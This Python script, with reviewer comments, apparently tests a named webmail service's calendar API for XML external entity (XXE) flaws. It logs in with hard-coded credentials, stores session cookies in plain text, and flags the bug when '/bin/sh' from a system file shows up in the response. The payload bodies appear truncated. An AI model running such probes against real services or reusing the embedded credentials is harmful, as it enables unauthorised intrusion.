import XXE_check
if __name__ == "__main__":
    # Driver: log in to the webmail service, then run each calendar test case
    # (add an entry, read the calendar view back, delete the entry again).
    try:
        checker = XXE_check.xxe_check()

        # Login.
        # NOTE(review): the account name and password are hard-coded in the
        # source and every URL below is plain http://, so the credentials and
        # the session id travel unencrypted. Load the secrets from the
        # environment or a secret store and prefer https:// where the service
        # offers it.
        portal_url = "http://mail.richinfo.cn/"
        login_api = "http://mail.richinfo.cn/webmail/login/loginapi.do"
        login_form = {
            'usernumber': "zhangxinxin",
            'password': "xinxin123",
            'validateCode': "",
            'returnurl': "http%3A%2F%2Fmail.richinfo.cn%2Fwebmail%2Flogin%2Flogin.do",
            'loginType': "WEB",
            'version': "version",
            'userid': "zhangxinxin",
            'mailType': "0",
            'passwordType': "0",
            'domain': "richinfo.cn",
            'mobileNumber': "zhangxinxin",
            'model': "MAIL",
        }
        checker.login(portal_url, login_api, login_form)
        session_id = checker.get_sid()

        # The same three endpoints serve every test case; only the body of the
        # "add" request differs.
        add_url = "http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid=" + session_id
        view_url = "http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid=" + session_id
        del_url = "http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid=" + session_id
        no_body = b""

        # (request body for the add call, banner printed after the check)
        # NOTE(review): the bodies look truncated in this listing - the first is
        # empty and the second is only "]>" - so as written no real document is
        # submitted; confirm against the original script.
        test_cases = (
            (b"", "测试用例为:"),
            (b"]>", "测试用例为:]>"),
        )
        for add_body, banner in test_cases:
            # Add the entry and inspect the calendar view.
            checker.XXE_go(add_url, add_body, view_url, no_body)
            print(banner)
            # Delete the entry that was just added.
            checker.del_test(del_url, no_body)
    except Exception as err:
        # Best effort: report the failure and exit normally.
        print(err)
import http.cookiejar
import re
import urllib.parse
import urllib.request
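class xxe_check:
    """Session-holding HTTP client used to probe a calendar API for XXE.

    One instance owns a cookie jar and an opener bound to it, so the session
    established by login() is reused by every later request.
    """

    def __init__(self):
        # Cookies set by the server are collected here and replayed by the opener.
        self.cj = http.cookiejar.CookieJar()
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(self.cj)
        )
        self.opener.addheaders = [('Content-Type', 'application/x-www-form-urlencoded')]

    def login(self, input_url, getLoginUrl, getLoginDict):
        """Log in and dump the session cookies to ``COOKIE.txt``.

        Args:
            input_url: Page requested first, only to collect its cookies.
            getLoginUrl: Login endpoint that receives the form as a POST body.
            getLoginDict: Form fields, URL-encoded before sending.
        """
        # Neither response body is used; the cookie jar is filled from the
        # response headers, so the connections are closed straight away.
        with self.opener.open(input_url):
            pass
        postData = urllib.parse.urlencode(getLoginDict).encode('utf-8')
        with self.opener.open(getLoginUrl, data=postData):
            pass
        # NOTE(review): session cookies are stored in clear text in the working
        # directory with default permissions; restrict access to this file or
        # read the value from self.cj instead of going through disk.
        with open("COOKIE.txt", "w") as f:
            for c in self.cj:
                # Each cookie is written twice (once bare, once followed by a
                # newline). get_sid() cuts the sid out at fixed offsets, so the
                # layout is deliberately left as it was.
                f.write(c.name + "=" + c.value + ";")
                f.write(c.name + "=" + c.value + ";" + "\n")

    def get_sid(self):
        """Return the session id cut out of ``COOKIE.txt``.

        The value is the 38 characters that start 4 characters after the first
        occurrence of "lang" in the file written by login().

        Raises:
            ValueError: If the file contains no "lang" marker, which would
                otherwise yield an arbitrary slice as the session id.
        """
        with open("COOKIE.txt") as f:
            allmsg = f.read()
        sid_location = allmsg.find("lang")
        if sid_location < 0:
            raise ValueError('no "lang" marker in COOKIE.txt; login may have failed')
        return allmsg[sid_location + 4:sid_location + 42]

    def XXE_go(self, add_url, add_dict, test_url, test_dict):
        """Submit one test case and report whether its marker is reflected.

        Posts ``add_dict`` to ``add_url``. If the reply contains "S_OK", posts
        ``test_dict`` to ``test_url`` and searches the record that starts at
        the returned sequence number, up to its first "}", for "/bin/sh".
        The verdict is printed. Only content reflected in that record is
        examined, so a negative verdict covers this one observation channel.

        Returns:
            0 when no sequence number could be read, the sequence-number text
            when it parses as a positive integer, otherwise None (also on any
            error, which is printed).
        """
        try:
            with self.opener.open(add_url, data=add_dict) as add_resp:
                for_seqNos = add_resp.read().decode("utf-8")
            # The three characters after `seqNo":` are taken as the sequence
            # number (assumes an unquoted number of up to 3 digits - TODO
            # confirm). Without the key there is nothing to slice.
            seq_at = for_seqNos.find("seqNo")
            seqNos = for_seqNos[seq_at + 7:seq_at + 10] if seq_at >= 0 else ""
            if "S_OK" in for_seqNos:
                # Read the calendar view back.
                with self.opener.open(test_url, data=test_dict) as view_resp:
                    all_msg = view_resp.read().decode("utf-8")
                # A blank sequence number would match at offset 0, so treat it
                # as "record not found".
                begin_msg = all_msg.find(seqNos) if seqNos.strip() else -1
                msg = all_msg[begin_msg:begin_msg + 1000] if begin_msg >= 0 else ""
                end_msg = msg.find("}")
                print(msg)
                # msg already starts at the record, so the record is msg up to
                # its first "}" (slicing with begin_msg a second time would
                # skip or empty it and hide a positive result).
                record = msg if end_msg < 0 else msg[:end_msg]
                if "/bin/sh" in record:
                    print("存在XXE漏洞")
                else:
                    print("不存在XXE漏洞")
            else:
                print("没有发现XXE漏洞")
            # Report whether a usable sequence number came back.
            if seqNos.strip() == "":
                return 0
            if int(seqNos) > 0:
                return seqNos
            return None
        except Exception as e:
            # Best effort: network, decoding and parsing errors are printed
            # and reported to the caller as None.
            print(e)
            return None

    def del_test(self, del_url, del_dict):
        """Delete the entry added by a test case and print the outcome."""
        with self.opener.open(del_url, data=del_dict) as res:
            reply = res.read().decode("utf-8")
        if '"code":"S_OK"' in reply:
            print("删除成功!")
        else:
            print("删除失败!")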